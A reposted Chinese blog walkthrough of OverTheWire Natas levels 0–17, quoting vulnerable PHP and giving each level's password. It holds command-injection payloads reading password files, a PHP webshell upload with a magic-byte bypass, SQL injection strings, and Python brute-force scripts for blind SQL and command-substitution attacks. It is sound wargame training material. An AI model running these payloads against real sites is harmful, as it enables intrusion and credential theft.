当前位置:网站首页>OverTheWire-Natas

OverTheWire-Natas

2022-07-25 09:17:00 目标是技术宅

https://overthewire.org/wargames/natas/
natas前17关,待更新~

1.natas0

F12

gtVrDuiDfck831PqWsLEZy5gyDz1clto

2.natas1

F12

ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

3.natas2

相似路径联想

F12,发现有一个图片的路径是/files/pixel.png,因此访问/files,可以看到除了pixel.png之外还有一个users.txt,访问users.txt得到通过密码

sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

4.natas3

robots.txt

No more information leaks!! Not even Google will find it this time…这句话是给出了robots.txt的提示,robots.txt是网站用来与网络爬虫(如谷歌)和其他网络机器人通信的标准,该标准规定了通知网络机器人不应处理或扫描网站的哪些区域。

访问robots.txt,看到Disallow: /s3cr3t/,因此访问该路径,看到user.txt,得到通关密码

Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

5.natas4

抓包修改Referer头

使网站认为访问是来自http://natas5.natas.labs.overthewire.org/

iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

6.natas5

抓包将loggedin字段改成1

aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

7.natas6
<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
    
        if($secret == $_POST['secret']) {
    
        print "Access granted. The password for natas7 is <censored>";
    } else {
    
        print "Wrong secret";
    }
    }
?>

访问/includes/secret.inc,得到$secret = “FOEIUWGHFEEUHOFUOIU”;提交secret得到通关密码

7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

8.natas7

有hint:

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

?page=/etc/natas_webpass/natas8

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

9.natas8
<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    
    print "Access granted. The password for natas9 is <censored>";
    } else {
    
    print "Wrong secret";
    }
}
?>

按顺序解密即可,写一段PHP

<?php
$secret = "3d3d516343746d4d6d6c315669563362";
echo base64_decode(strrev(hex2bin($secret)));
?>

得到oubWYf2kBq并提交

W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

10.natas9

命令注入

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    
    $key = $_REQUEST["needle"];
}

if($key != "") {
    
    passthru("grep -i $key dictionary.txt");
}
?>

根据输入的key值在dictionary.txt中进行检索,passthru函数用于执行命令,和exec函数比较相似,所以采用命令注入

; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

11.natas10

一次grep多个文件

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    
    $key = $_REQUEST["needle"];
}

if($key != "") {
    
    if(preg_match('/[;|&]/',$key)) {
    
        print "Input contains an illegal character!";
    } else {
    
        passthru("grep -i $key dictionary.txt");
    }
}
?>

绕过了; | &,所以无法增加额外的命令,只能在grep上下手,将匹配字符设置为’',可以匹配所有字符,获取两个文件的所有内容

'' /etc/natas_webpass/natas11

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

12.natas11

伪造cookie

<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    
    	$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    	if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
    
        	if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
    
        		$mydata['showpassword'] = $tempdata['showpassword'];
        		$mydata['bgcolor'] = $tempdata['bgcolor'];
        	}
   		}
    }
    return $mydata;
}

function saveData($d) {
    
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
    
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
<?
if($data["showpassword"] == "yes") {
    
    print "The password for natas12 is <censored><br>";
}
?>

cookie中data值为ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw%3D,这里要把%3D替换成=号,为ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw=

第一步计算出xor_encrypt中的$key值,将$defaultdata中的内容json加密,与cookie中data值异或,就可以得到key值为qw8J

第二步计算伪造的cookie:

$test1 = base64_encode(xor_encrypt(json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));

得到ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

第三步,将浏览器的cookie替换,刷新页面,得到通过密码

EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

13.natas12

文件后缀修改

if(array_key_exists("filename", $_POST)) {
    
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
    
        echo "File is too big";
    } else {
    
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
    
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
    
}

关键是发现上传的文件链接是能够访问的,因此上传一个jpg文件,抓包修改后缀为php,使其上传成功,然后点击链接执行php。

<?php system("cat /etc/natas_pass/natas13"); ?>

jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

14.natas13

exif_imagetype

else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
    
        echo "File is not an image";
    }

exif_imagetype读图像的第一个字节并检查其签名。文件签名可以在https://filesignatures.net/查到

所以通过在上传的php前增加几个字节为FF D8 FF E0来绕过检测,再抓包修改后缀为php

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

15.natas14

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

构造SQL注入,username随便输,password为1" or "1" = "1

AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

16.natas15

SQL盲注

   $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
    
        echo "Executing query: $query<br>";
    }
    $res = mysql_query($query, $link);
    if($res) {
    
    if(mysql_num_rows($res) > 0) {
    
        echo "This user exists.<br>";
    } else {
    
        echo "This user doesn't exist.<br>";
    }
    } else {
    
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
    
?>

还提供了

CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);

猜测username为 natas16,然后爆破password,如果password是正确的就会满足mysql_num_rows($res) > 0。爆破下面的123字段即可

natas16" and password = "123

以下为参考的爆破python代码。因为PHP代码中是从$_REQUEST接收参数,因此可以通过GET方式提交数据。

脚本前半部分用于确认密码中包含的字符缩小爆破范围

import requests,string

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"

# characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
characters = ''.join([string.ascii_letters,string.digits])

# Begin by building a dictionary of characters found in the password
# This will greatly decrease the complexity for our brute force attempts
password_dictionary = []
exists_str = "This user exists."
for char in characters:
    uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"%',char,'%','&debug'])
    r = requests.get(uri, auth=(auth_username,auth_password))
    if exists_str in r.text:
        password_dictionary.append(char)
        print("Password Dictionary: {0}".format(''.join(password_dictionary)))
print("Dictionary build complete.")
print("Dictionary: {0}".format(''.join(password_dictionary)))

脚本后半部分开始一个字符一个字符确认

print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
    for char in password_dictionary:
        test = ''.join([password,char])
        # Build the GET Request
        uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"',test,'%','&debug'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username,auth_password))
        # Parse the HTTP response
        if exists_str in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password),password))

WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

17.natas16

命令替换

if($key != "") {
    
    if(preg_match('/[;|&`\'"]/',$key)) {
    
        print "Input contains an illegal character!";
    } else {
    
        passthru("grep -i \"$key\" dictionary.txt");
    }
}

命令替换允许命令的输出替换命令本身。当命令按如下方式括起来时,就会发生命令替换

$(command)
`command

编写脚本,通过命令替换输出结果。不能输入空字符串,所以需要不断试字符。

如果/etc/natas_webpass/natas17中没a,内部命令没有输出,就会运行grep whitest,得到whitest输出;如果有a,就会形成whitestXXX,字典中没有这个词,输出为空。

因此如果whitest没有在输出中,说明/etc/natas_webpass/natas17中包含这个字符。

whitest$(grep ^a /etc/natas_webpass/natas17)

脚本先测试它有哪些字符,然后一个一个测开始字符。^表示以后面的字符串为开头

import requests,string
from bs4 import BeautifulSoup

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"

characters = ''.join([string.ascii_letters,string.digits])
password_dictionary = []

for char in characters:
    uri = ''.join([url,'?','needle=whitest$(grep ',char,' /etc/natas_webpass/natas17)'])
    r = requests.get(uri, auth=(auth_username,auth_password))
    if "whitest" not in r.text:
    	password_dictionary.append(char)
    	print(''.join(password_dictionary))
print("Dictionary build complete.")
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
    for char in password_dictionary:
        test = ''.join([password,char])
        # Build the GET Request
        uri = ''.join([url,'?','needle=whitest$(grep ^',test,' /etc/natas_webpass/natas17)'])
        # Send the HTTP GET request to the server
        r = requests.get(uri, auth=(auth_username,auth_password))
        # Parse the HTTP response
        if "whitest" not in r.text:
            password_list.append(char)
            password = ''.join(password_list)
            print("Length: {0}, Password: {1}".format(len(password),password))

8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

18.natas17
/* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
    
        echo "Executing query: $query<br>";
    }
    $res = mysql_query($query, $link);
    if($res) {
    
    if(mysql_num_rows($res) > 0) {
    
        //echo "This user exists.<br>";
    } else {
    
        //echo "This user doesn't exist.<br>";
    }
    } else {
    
        //echo "Error in query.<br>";
    }
    mysql_close($link);

在提交框中测试下面的输入,发现页面返回有明显的延迟,因此可以通过sleep函数来检测前面的条件是否成立。

natas18" and sleep(5)#
原网站

版权声明
本文为[目标是技术宅]所创,转载请带上原文链接,感谢
https://blog.csdn.net/LJFYYJ/article/details/125948415

边栏推荐

猜你喜欢

随机推荐